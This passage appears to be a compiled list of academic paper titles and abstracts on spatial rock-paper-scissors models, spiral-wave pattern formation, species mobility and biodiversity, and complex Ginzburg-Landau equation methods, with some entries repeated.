pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: Spatial social dilemmas: dilution, mobility and grouping effects with imitation dynamics paper_content: We present an extensive, systematic study of the Prisoner's Dilemma and Snowdrift games on a square lattice under a synchronous, noiseless imitation dynamics. We show that for both the occupancy of the network and the (random) mobility of the agents there are intermediate values that may increase the amount of cooperators in the system and new phases appear. We analytically determine the transition lines between these phases and compare with the mean field prediction and the observed behavior on a square lattice. We point out which are the more relevant microscopic processes that entitle cooperators to invade a population of defectors in the presence of mobility and discuss the universality of these results. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Random mobility and spatial structure often enhance cooperation paper_content: The effects of an unconditional move rule in the spatial Prisoner's Dilemma, Snowdrift and Stag Hunt games are studied. Spatial structure by itself is known to modify the outcome of many games when compared with a randomly mixed population, sometimes promoting, sometimes inhibiting cooperation. Here we show that random dilution and mobility may suppress the inhibiting factors of the spatial structure in the Snowdrift game, while enhancing the already larger cooperation found in the Prisoner's dilemma and Stag Hunt games. --- paper_title: Coevolutionary dynamics in structured populations ofthree species paper_content: Inspired by the experiments with the three strains of E. coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extension repeating the proposed mathematical ::: analysis and computer simulations. ::: The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. ::: The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: Velocity-enhanced Cooperation of Moving Agents playing Public Goods Games paper_content: In this Brief Report we study the evolutionary dynamics of the Public Goods Game in a population of mobile agents embedded in a 2-dimensional space. In this framework, the backbone of interactions between agents changes in time, allowing us to study the impact that mobility has on the emergence of cooperation in structured populations. We compare our results with a static case in which agents interact on top of a Random Geometric Graph. Our results point out that a low degree of mobility enhances the onset of cooperation in the system while a moderate velocity favors the fixation of the full-cooperative state. --- paper_title: Spiral Waves Emergence in a Cyclic Predator-Prey Model paper_content: Based on a cyclic predator-prey model of three species, spiral waves on global level of the system are obtained. It is found that the predation intensity greatly affects on the behaviors of spiral waves. The wavelength of spiral waves alter with the mobility in the form of λ~D θ . Values of θ are determined by predation rates between species. It indicates the behaviors of spiral waves varying with mobility are universal at the same predation rate which reveals competition of resources among species. --- paper_title: Effect of epidemic spreading on species coexistence in spatial rock-paper-scissors games paper_content: A fundamental question in nonlinear science and evolutionary biology is how epidemic spreading may affect coexistence. We address this question in the framework of mobile species under cyclic competitions by investigating the roles of both intra- and interspecies spreading. A surprising finding is that intraspecies infection can strongly promote coexistence while interspecies spreading cannot. These results are quantified and a theoretical paradigm based on nonlinear partial differential equations is derived to explain the numerical results. --- paper_title: Pattern formation, synchronization, and outbreak of biodiversity in cyclically competing games paper_content: Species in nature are typically mobile over diverse distance scales, examples of which range from bacteria run to long-distance animal migrations. These behaviors can have a significant impact on biodiversity. Addressing the role of migration in biodiversity microscopically is fundamental but remains a challenging problem in interdisciplinary science. We incorporate both intra- and inter-patch migrations in stochastic games of cyclic competitions and find that the interplay between the migrations at the local and global scales can lead to robust species coexistence characterized dynamically by the occurrence of remarkable target-wave patterns in the absence of any external control. The waves can emerge from either mixed populations or isolated species in different patches, regardless of the size and the location of the migration target. We also find that, even in a single-species system, target waves can arise from rare mutations, leading to an outbreak of biodiversity. A surprising phenomenon is that target waves in different patches can exhibit synchronization and time-delayed synchronization, where the latter potentially enables the prediction of future evolutionary dynamics. We provide a physical theory based on the spatiotemporal organization of the target waves to explain the synchronization phenomena. We also investigate the basins of coexistence and extinction to establish the robustness of biodiversity through migrations. Our results are relevant to issues of general and broader interest such as pattern formation, control in excitable systems, and the origin of order arising from self-organization in social and natural systems. --- paper_title: Cyclic competition of mobile species on continuous space: pattern formation and coexistence. paper_content: We propose a model for cyclically competing species on continuous space and investigate the effect of the interplay between the interaction range and mobility on coexistence. A transition from coexistence to extinction is uncovered with a strikingly nonmonotonic behavior in the coexistence probability. About the minimum in the probability, switches between spiral and plane-wave patterns arise. A strong mobility can either promote or hamper coexistence, depending on the radius of the interaction range. These phenomena are absent in any lattice-based model, and we demonstrate that they can be explained using nonlinear partial differential equations. Our continuous-space model is more physical and we expect the findings to generate experimental interest. --- paper_title: Effects of competition on pattern formation in the rock-paper-scissors game paper_content: We investigate the impact of cyclic competition on pattern formation in the rock-paper-scissors game. By separately considering random and prepared initial conditions, we observe a critical influence of the competition rate p on the stability of spiral waves and on the emergence of biodiversity. In particular, while increasing values of p promote biodiversity, they may act detrimentally on spatial pattern formation. For random initial conditions, we observe a phase transition from biodiversity to an absorbing phase, whereby the critical value of mobility grows linearly with increasing values of p on a log-log scale but then saturates as p becomes large. For prepared initial conditions, we observe the formation of single-armed spirals, but only for values of p that are below a critical value. Once above that value, the spirals break up and form disordered spatial structures, mainly because of the percolation of vacant sites. Thus there exists a critical value of the competition rates p(c) for stable single-armed spirals in finite populations. Importantly though, p(c) increases with increasing system size because noise reinforces the disintegration of ordered patterns. In addition, we also find that p(c) increases with the mobility. These phenomena are reproduced by a deterministic model that is based on nonlinear partial differential equations. Our findings indicate that competition is vital for the sustenance of biodiversity and the emergence of pattern formation in ecosystems governed by cyclical interactions. --- paper_title: Self-Organization of Mobile Populations in Cyclic Competition paper_content: The formation of out-of-equilibrium patterns is a characteristic feature of spatially extended, biodiverse, ecological systems. Intriguing examples are provided by cyclic competition of species, as metaphorically described by the 'rock-paper-scissors' game. Both experimentally and theoretically, such non-transitive interactions have been found to induce self-organization of static individuals into noisy, irregular clusters. However, a profound understanding and characterization of such patterns is still lacking. Here, we theoretically investigate the influence of individuals' mobility on the spatial structures emerging in rock-paper-scissors games. We devise a quantitative approach to analyze the spatial patterns self-forming in the course of the stochastic time evolution. For a paradigmatic model originally introduced by May and Leonard, within an interacting particle approach, we demonstrate that the system's behavior-in the proper continuum limit-is aptly captured by a set of stochastic partial differential equations. The system's stochastic dynamics is shown to lead to the emergence of entangled rotating spiral waves. While the spirals' wavelength and spreading velocity is demonstrated to be accurately predicted by a (deterministic) complex Ginzburg-Landau equation, their entanglement results from the inherent stochastic nature of the system. These findings and our methods have important applications for understanding the formation of noisy patterns, e.g. in ecological and evolutionary contexts, and are also of relevance for the kinetics of (bio)-chemical reactions. --- paper_title: Basins of coexistence and extinction in spatially extended ecosystems of cyclically competing species paper_content: Microscopic models based on evolutionary games on spatially extended scales have recently been developed to address the fundamental issue of species coexistence. In this pursuit almost all existing works focus on the relevant dynamical behaviors originated from a single but physically reasonable initial condition. To gain comprehensive and global insights into the dynamics of coexistence, here we explore the basins of coexistence and extinction and investigate how they evolve as a basic parameter of the system is varied. Our model is cyclic competitions among three species as described by the classical rock-paper-scissors game, and we consider both discrete lattice and continuous space, incorporating species mobility and intraspecific competitions. Our results reveal that, for all cases considered, a basin of coexistence always emerges and persists in a substantial part of the parameter space, indicating that coexistence is a robust phenomenon. Factors such as intraspecific competition can, in fact, promote coexistence by facilitating the emergence of the coexistence basin. In addition, we find that the extinction basins can exhibit quite complex structures in terms of the convergence time toward the final state for different initial conditions. We have also developed models based on partial differential equations, which yield basin structures that are in good agreement with those from microscopic stochastic simulations. To understand the origin and emergence of the observed complicated basin structures is challenging at the present due to the extremely high dimensional nature of the underlying dynamical system. --- paper_title: Does mobility decrease cooperation? paper_content: We explore the minimal conditions for sustainable cooperation on a spatially distributed population of memoryless, unconditional strategies (cooperators and defectors) in presence of unbiased, non-contingent mobility in the context of the Prisoner's Dilemma game. We find that cooperative behavior is not only possible but may even be enhanced by such an "always-move" rule, when compared with the strongly viscous ("never-move") case. In addition, mobility also increases the capability of cooperation to emerge and invade a population of defectors, what may have a fundamental role in the problem of the onset of cooperation. --- paper_title: Effects of mobility in a population of Prisoner's Dilemma players paper_content: We address the problem of how the survival of cooperation in a social system depends on the motion of the individuals. Specifically, we study a model in which prisoner's dilemma players are allowed to move in a two-dimensional plane. Our results show that cooperation can survive in such a system provided that both the temptation to defect and the velocity at which agents move are not too high. Moreover, we show that when these conditions are fulfilled, the only asymptotic state of the system is that in which all players are cooperators. Our results might have implications for the design of cooperative strategies in motion coordination and other applications including wireless networks. --- paper_title: Noise and Correlations in a Spatial Population Model with Cyclic Competition paper_content: Noise and spatial degrees of freedom characterize most ecosystems. Some aspects of their influence on the coevolution of populations with cyclic interspecies competition have been demonstrated in recent experiments e.g., B. Kerr , Nature (London) 418, 171 (2002)]. To reach a better theoretical understanding of these phenomena, we consider a paradigmatic spatial model where three species exhibit cyclic dominance. Using an individual-based description, as well as stochastic partial differential and deterministic reaction-diffusion equations, we account for stochastic fluctuations and spatial diffusion at different levels and show how fascinating patterns of entangled spirals emerge. We rationalize our analysis by computing the spatiotemporal correlation functions and provide analytical expressions for the front velocity and the wavelength of the propagating spiral waves. --- paper_title: Vortex dynamics in a three-state model under cyclic dominance. paper_content: The evolution of domain structure is investigated in a two-dimensional voter model with three states under cyclic dominance. The study focus on the dynamics of vortices, defined by the points where the three states (domains) meet. We can distinguish vortices and antivortices which walk randomly and annihilate each other. The domain wall motion can create vortex-antivortex pairs at a rate that is increased by the spiral formation due to cyclic dominance. This mechanism is contrasted with a branching annihilating random walk (BARW) in a particle-antiparticle system with density-dependent pair creation rate. Numerical estimates for the critical indices of the vortex density [beta=0.29(4)] and of its fluctuation [gamma=0.34(6)] improve an earlier Monte Carlo study [K. Tainaka and Y. Itoh, Europhys. Lett. 15, 399 (1991)] of the three-state cyclic model in two dimensions. --- paper_title: Emergence of target waves in paced populations of cyclically competing species paper_content: We investigate the emergence of target waves in a cyclic predator-prey model incorporating a periodic current of the three competing species in a small area situated at the center of the square lattice. The periodic current acts as a pacemaker, trying to impose its rhythm on the overall spatiotemporal evolution of the three species. We show that the pacemaker is able to nucleate target waves that eventually spread across the whole population, whereby three routes leading to this phenomenon can be distinguished depending on the mobility of the three species and the oscillation period of the localized current. First, target waves can emerge due to the synchronization between the periodic current and oscillations of the density of the three species on the spatial grid. The second route is similar to the first, the difference being that the synchronization sets in only intermittently. Finally, the third route towards target waves is realized when the frequency of the pacemaker is much higher than that characterizing the oscillations of the overall density of the three species. By considering mobility and the frequency of the current as variable parameters, we thus provide insights into the mechanisms of pattern formation resulting from the interplay between local and global dynamics in systems governed by cyclically competing species. --- paper_title: Discriminating the effects of spatial extent and population size in cyclic competition among species paper_content: We introduce a population model for species under cyclic competition. This model allows individuals to coexist and interact on single cells while migration takes place between adjacent cells. In contrast to the model introduced by Reichenbach, Mobilia, and Frey [Reichenbach, Mobilia, and Frey, Nature (London) 448, 1046 (2007)], we find that the emergence of spirals results in an ambiguous behavior regarding the stability of coexistence. The typical time until extinction exhibits, however, a qualitatively opposite dependence on the newly introduced nonunit carrying capacity in the spiraling and the nonspiraling regimes. This allows us to determine a critical mobility that marks the onset of this spiraling state sharply. In contrast, we demonstrate that the conventional finite size stability analysis with respect to spatial size is of limited use for identifying the onset of the spiraling regime. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Co-existence in the two-dimensional May-Leonard model with random rates paper_content: We employ Monte Carlo simulations to numerically study the temporal evolution and transient oscillations of the population densities, the associated frequency power spectra, and the spatial correlation functions in the (quasi-) steady state in two-dimensional stochastic May-Leonard models of mobile individuals, allowing for particle exchanges with nearest-neighbors and hopping onto empty sites. We therefore consider a class of four-state three-species cyclic predator-prey models whose total particle number is not conserved. We demonstrate that quenched disorder in either the reaction or in the mobility rates hardly impacts the dynamical evolution, the emergence and structure of spiral patterns, or the mean extinction time in this system. We also show that direct particle pair exchange processes promote the formation of regular spiral structures. Moreover, upon increasing the rates of mobility, we observe a remarkable change in the extinction properties in the May-Leonard system (for small system sizes): (1) as the mobility rate exceeds a threshold that separates a species coexistence (quasi-) steady state from an absorbing state, the mean extinction time as function of system size N crosses over from a functional form ∼ e cN /N (where c is a constant) to a linear dependence; (2) the measured histogram of extinction times displays a corresponding crossover from an (approximately) exponential to a Gaussian distribution. The latter results are found to hold true also when the mobility rates are randomly distributed. --- paper_title: Spatial Rock-Paper-Scissors Models with Inhomogeneous Reaction Rates paper_content: We study several variants of the stochastic four-state rock-paper-scissors game or, equivalently, cyclic three-species predator-prey models with conserved total particle density, by means of Monte Carlo simulations on one- and two-dimensional lattices. Specifically, we investigate the influence of spatial variability of the reaction rates and site occupancy restrictions on the transient oscillations of the species densities and on spatial correlation functions in the quasistationary coexistence state. For small systems, we also numerically determine the dependence of typical extinction times on the number of lattice sites. In stark contrast with two-species stochastic Lotka-Volterra systems, we find that for our three-species models with cyclic competition quenched disorder in the reaction rates has very little effect on the dynamics and the long-time properties of the coexistence state. Similarly, we observe that site restriction only has a minor influence on the system's dynamical properties. Our results therefore demonstrate that the features of the spatial rock-paper-scissors system are remarkably robust with respect to model variations, and stochastic fluctuations as well as spatial correlations play a comparatively minor role. --- paper_title: Handbook of Stochastic Methods: For Physics, Chemistry and the Natural Sciences paper_content: The Handbook of Stochastic Methods covers systematically and in simple language the foundations of Markov systems, stochastic differential equations, Fokker-Planck equations, approximation methods, chemical master equations, and quatum-mechanical Markov processes. Strong emphasis is placed on systematic approximation methods for solving problems. Stochastic adiabatic elimination is newly formulated. The book contains the "folklore" of stochastic methods in systematic form and is suitable for use as a reference work. --- paper_title: Coevolutionary dynamics in structured populations ofthree species paper_content: Inspired by the experiments with the three strains of E. coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extension repeating the proposed mathematical ::: analysis and computer simulations. ::: The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. ::: The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: Global attractors and extinction dynamics of cyclically competing species paper_content: Transitions to absorbing states are of fundamental importance in nonequilibrium physics as well as ecology. In ecology, absorbing states correspond to the extinction of species. We here study the spatial population dynamics of three cyclically interacting species. The interaction scheme comprises both direct competition between species as in the cyclic Lotka-Volterra model, and separated selection and reproduction processes as in the May-Leonard model. We show that the dynamic processes leading to the transient maintenance of biodiversity are closely linked to attractors of the nonlinear dynamics for the overall species' concentrations. The characteristics of these global attractors change qualitatively at certain threshold values of the mobility and depend on the relative strength of the different types of competition between species. They give information about the scaling of extinction times with the system size and thereby the stability of biodiversity. We define an effective free energy as the negative logarithm of the probability to find the system in a specific global state before reaching one of the absorbing states. The global attractors then correspond to minima of this effective energy landscape and determine the most probable values for the species' global concentrations. As in equilibrium thermodynamics, qualitative changes in the effective free energy landscape indicate and characterize the underlying nonequilibrium phase transitions. We provide the complete phase diagrams for the population dynamics and give a comprehensive analysis of the spatio-temporal dynamics and routes to extinction in the respective phases. --- paper_title: Local migration promotes competitive restraint in a host–pathogen 'tragedy of the commons' paper_content: These T4 page and their E. coli hosts are the model for a typical 'victim-exploiter' interaction in a study of the role of migration patterns in a 'tragedy of the commons' competition for limited resources within fragmented communities. In this host-pathogen system, growing in 96-well microtitre plates, coexistence, stability and evolution within the separated communities depend critically on migration: restricted migration can promote restraint in the use of the common resource. In this experiment and in theory, highly connected social networks favour virulence. Fragmented populations possess an intriguing duplicity: even if subpopulations are reliably extinction-prone, asynchrony in local extinctions and recolonizations makes global persistence possible1,2,3,4,5,6,7,8. Migration is a double-edged sword in such cases: too little migration prevents recolonization of extinct patches, whereas too much synchronizes subpopulations, raising the likelihood of global extinction. Both edges of this proverbial sword have been explored by manipulating the rate of migration within experimental populations1,3,4,5,6,8. However, few experiments have examined how the evolutionary ecology of fragmented populations depends on the pattern of migration5. Here, we show that the migration pattern affects both coexistence and evolution within a community of bacterial hosts (Escherichia coli) and viral pathogens (T4 coliphage) distributed across a large network of subpopulations. In particular, different patterns of migration select for distinct pathogen strategies, which we term 'rapacious' and 'prudent'. These strategies define a 'tragedy of the commons'9: rapacious phage displace prudent variants for shared host resources, but prudent phage are more productive when alone. We find that prudent phage dominate when migration is spatially restricted, while rapacious phage evolve under unrestricted migration. Thus, migration pattern alone can determine whether a de novo tragedy of the commons is resolved in favour of restraint. --- paper_title: Evolution of restraint in a structured rock-paper-scissors community. paper_content: It is not immediately clear how costly behavior that benefits others evolves by natural selection. By saving on inherent costs, individuals that do not contribute socially have a selective advantage over altruists if both types receive equal benefits. Restrained consumption of a common resource is a form of altruism. The cost of this kind of prudent behavior is that restrained individuals give up resources to less-restrained individuals. The benefit of restraint is that better resource management may prolong the persistence of the group. One way to dodge the problem of defection is for altruists to interact disproportionately with other altruists. With limited dispersal, restrained individuals persist because of interaction with like types, whereas it is the unrestrained individuals that must face the negative long-term consequences of their rapacity. Here, we study the evolution of restraint in a community of three competitors exhibiting a nontransitive (rock–paper–scissors) relationship. The nontransitivity ensures a form of negative feedback, whereby improvement in growth of one competitor has the counterintuitive consequence of lowering the density of that improved player. This negative feedback generates detrimental long-term consequences for unrestrained growth. Using both computer simulations and evolution experiments with a nontransitive community of Escherichia coli, we find that restrained growth can evolve under conditions of limited dispersal in which negative feedback is present. This research, thus, highlights a set of ecological conditions sufficient for the evolution of one form of altruism. --- paper_title: Characterization of spiraling patterns in spatial rock-paper-scissors games paper_content: The spatiotemporal arrangement of interacting populations often influences the maintenance of species diversity and is a subject of intense research. Here, we study the spatiotemporal patterns arising from the cyclic competition between three species in two dimensions. Inspired by recent experiments, we consider a generic metapopulation model comprising “rock-paper-scissors” interactions via dominance removal and replacement, reproduction, mutations, pair exchange, and hopping of individuals. By combining analytical and numerical methods, we obtain the model's phase diagram near its Hopf bifurcation and quantitatively characterize the properties of the spiraling patterns arising in each phase. The phases characterizing the cyclic competition away from the Hopf bifurcation (at low mutation rate) are also investigated. Our analytical approach relies on the careful analysis of the properties of the complex Ginzburg-Landau equation derived through a controlled (perturbative) multiscale expansion around the model's Hopf bifurcation. Our results allow us to clarify when spatial “rock-paper-scissors” competition leads to stable spiral waves and under which circumstances they are influenced by nonlinear mobility. --- paper_title: Spirals and coarsening patterns in the competition of many species: A complex Ginzburg-Landau approach paper_content: In order to model real ecological systems one has to consider many species that interact in complex ways. However, most of the recent theoretical studies have been restricted to few species systems with rather trivial interactions. The few studies dealing with larger number of species and/or more complex interaction schemes are mostly restricted to numerical explorations. In this paper we determine, starting from the deterministic mean-field rate equations, for large classes of systems the space of coexistence fixed points at which biodiversity is maximal. For systems with a single coexistence fixed point we derive complex Ginzburg–Landau equations that allow to describe space-time pattern realized in two space dimensions. For selected cases we compare the theoretical predictions with the pattern observed in numerical simulations. --- paper_title: Mobility promotes and jeopardizes biodiversity in rock-paper-scissors games paper_content: Biodiversity is essential to the viability of ecological systems. Species diversity in ecosystems is promoted by cyclic, non-hierarchical interactions among competing populations. Such non-transitive relations lead to an evolution with central features represented by the `rock-paper-scissors' game, where rock crushes scissors, scissors cut paper, and paper wraps rock. In combination with spatial dispersal of static populations, this type of competition results in the stable coexistence of all species and the long-term maintenance of biodiversity. However, population mobility is a central feature of real ecosystems: animals migrate, bacteria run and tumble. Here, we observe a critical influence of mobility on species diversity. When mobility exceeds a certain value, biodiversity is jeopardized and lost. In contrast, below this critical threshold all subpopulations coexist and an entanglement of travelling spiral waves forms in the course of temporal evolution. We establish that this phenomenon is robust, it does not depend on the details of cyclic competition or spatial environment. These findings have important implications for maintenance and evolution of ecological systems and are relevant for the formation and propagation of patterns in excitable media, such as chemical kinetics or epidemic outbreaks. --- paper_title: Phase diagrams for three-strategy evolutionary prisoner's dilemma games on regular graphs paper_content: Evolutionary prisoner's dilemma games are studied with players located on square lattice and random regular graph defining four neighbors for each one. The players follow one of the three strategies: tit-for-tat, unconditional cooperation, and defection. The simplified payoff matrix is characterized by two parameters: the temptation b to choose defection and the cost c of inspection reducing the income of tit-for-tat. The strategy imitation from one of the neighbors is controlled by pairwise comparison at a fixed level of noise. Using Monte Carlo simulations and the extended versions of pair approximation we have evaluated the b-c phase diagrams indicating a rich plethora of phase transitions between stationary coexistence, absorbing, and oscillatory states, including continuous and discontinuous phase transitions. By reasonable costs the tit-for-tat strategy prevents extinction of cooperators across the whole span of b determining the prisoner's dilemma game, irrespective of the connectivity structure. We also demonstrate that the system can exhibit a repetitive succession of oscillatory and stationary states upon changing a single payoff value, which highlights the remarkable sensitivity of cyclical interactions on the parameters that define the strength of dominance. --- paper_title: Fronts, pulses, sources and sinks in generalized complex Ginzburg-Landau equations paper_content: An important clement in the long-time dynamics of pattern forming systems is a class of solutions we will call "coherent structures". These are states that are either themselves localized, or that consist of domains of regular patterns connected by localized defects or interfaces. This paper summarizes and extends recent work on such coherent structures in the one-dimensional complex Ginzburg-Landau equation and its generalizations, for which rather complete information can be obtained on the existence and competition of fronts, pulses, sources and sinks. For the special subclass of uniformly translating structures, the solutions are derived from a set of ordinary differential equations that can be interpreted as a flow in a three-dimensional phase space. Fixed points of the flow correspond to the two basic building blocks of coherent structures, uniform amplitude states and evanescent waves whose amplitude decreases smoothly to zero. A study of the stability of the fixed points under the flow leads to results on the existence and multiplicity of the different coherent structures. The dynamical analysis of the original partial differential equation focusses on the competition between pulses and fronts, and is expressed in terms of a set of conjectures for front propagation that generalize the "marginal stability" and "pinch-point" approaches of earlier authors. These rules, together with an exact front solution whose dynamics plays an important role in the selection of patterns, yield an analytic expression for the upper limit of the range of existence of pulse solutions, as well as a determination of the regions of parameter space where uniformly translating fron t solutions can exist. Extensive numerical simulations show consistency with these rules and conjectures for the existence of fronts and pulses. In the parameter ranges where no uniformly translating fronts can exist, examples are shown of irregularly spreading fronts that generate strongly chaotic regions, as well as nonuniformly translating fronts that lead to uniform amplitude states. Recent perturbative treatments based on expansions about the nonlinear Schr6dinger equation are generalized to perturbations of the cubic-quintic and derivative Schr~idinger equations, for which both pulses and fronts exist in the unperturbed system. Comparison of the results with the exact solutions shows that the perturbation theory only yields a subset of the relevant solutions. Nevertheless, those that are obtained are found to be consistent with the general conjectures, and in particular they provide an analytic demonstration of front/pulse competition. While the discussion of the competition between fronts and pulses focusses on the complex Ginzburg-Landau equation with quintic terms and a subcritical bifurcation, a number of results are also presented for the cubic equation. In particular, the existence of a family of moving source solutions derived by Bekki and Nozaki for this equation contradicts the naive counting arguments. We attribute this contradiction to a hidden symmetry of the solution but have not been able to show explicitly how this symmetry affects the phase space orbits. --- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Theory of interaction and bound states of spiral waves in oscillatory media paper_content: We present an alternative method for the calculation of the interaction between spirals in oscillatory media. This method is based on a rigorous evaluation of the perturbation of an isolated spiral resulting from neighboring spirals in a linear approximation. For the complex Ginzburg-Landau equation, the existence of bound states is identified with the parameter range where the perturbations behave in an oscillatory manner. The results for the equilibrium distance for two spirals in the bound state and also the dependence of the velocity of the spiral on the distance are in good agreement with numerical simulations. In the equally charged case, we find multiple bound states which may be interpreted as multiply armed spirals. Outside the oscillatory range, well-separated spirals appear to repel each other regardless of topological charge. --- paper_title: Instability of spatial patterns and its ambiguous impact on species diversity paper_content: Self-arrangement of individuals into spatial patterns often accompanies and promotes species diversity in ecological systems. Here, we investigate pattern formation arising from cyclic dominance of three species, operating near a bifurcation point. In its vicinity, an Eckhaus instability occurs, leading to convectively unstable "blurred" patterns. At the bifurcation point, stochastic effects dominate and induce counterintuitive effects on diversity: Large patterns, emerging for medium values of individuals' mobility, lead to rapid species extinction, while small patterns (low mobility) promote diversity, and high mobilities render spatial structures irrelevant. We provide a quantitative analysis of these phenomena, employing a complex Ginzburg-Landau equation. --- paper_title: The world of the complex Ginzburg-Landau equation paper_content: The cubic complex Ginzburg-Landau equation is one of the most-studied nonlinear equations in the physics community. It describes a vast variety of phenomena from nonlinear waves to second-order phase transitions, from superconductivity, superfluidity, and Bose-Einstein condensation to liquid crystals and strings in field theory. The authors give an overview of various phenomena described by the complex Ginzburg-Landau equation in one, two, and three dimensions from the point of view of condensed-matter physicists. Their aim is to study the relevant solutions in order to gain insight into nonequilibrium phenomena in spatially extended systems. --- paper_title: Nonlinear Aspects of Competition Between Three Species paper_content: It is shown that for three competitors, the classic Gause–Lotka–Volterra equations possess a special class of periodic limit cycle solutions, and a general class of solutions in which the system exhibits nonperiodic population oscillations of bounded amplitude but ever increasing cycle time. Biologically, the result is interesting as a caricature of the complexities that nonlinearities can introduce even into the simplest equations of population biology ; mathematically, the model illustrates some novel tactical tricks and dynamical peculiarities for 3-dimensional nonlinear systems. --- paper_title: Coevolutionary dynamics in structured populations ofthree species paper_content: Inspired by the experiments with the three strains of E. coli bacteria as well as the three morphs of Uta stansburiana lizards, a model of cyclic dominance was proposed to investigate the mechanisms facilitating the maintenance of biodiversity in spatially structured populations. Subsequent studies enriched the original model with various biologically motivated extension repeating the proposed mathematical ::: analysis and computer simulations. ::: The research presented in this thesis unifies and generalises these models by combining the birth, selection-removal, selection-replacement and mutation processes as well as two forms of mobility into a generic metapopulation model. Instead of the standard mathematical treatment, more controlled analysis with inverse system size and multiscale asymptotic expansions is presented to derive an approximation of the system dynamics in terms of a well-known pattern forming equation. The novel analysis, capable of increased accuracy, is evaluated with improved numerical experiments performed with bespoke software developed for simulating the stochastic and deterministic descriptions of the generic metapopulation model. ::: The emergence of spiral waves facilitating the long term biodiversity is confirmed in the computer simulations as predicted by the theory. The derived conditions on the stability of spiral patterns for different values of the biological parameters are studied resulting in discoveries of interesting phenomena such as spiral annihilation or instabilities caused by nonlinear diffusive terms. --- paper_title: A non-linear instability theory for a wave system in plane Poiseuille flow paper_content: The initial-value problem for linearized perturbations is discussed, and the asymptotic solution for large time is given. For values of the Reynolds number slightly greater than the critical value, above which perturbations may grow, the asymptotic solution is used as a guide in the choice of appropriate length and time scales for slow variations in the amplitude A of a non-linear two-dimensional perturbation 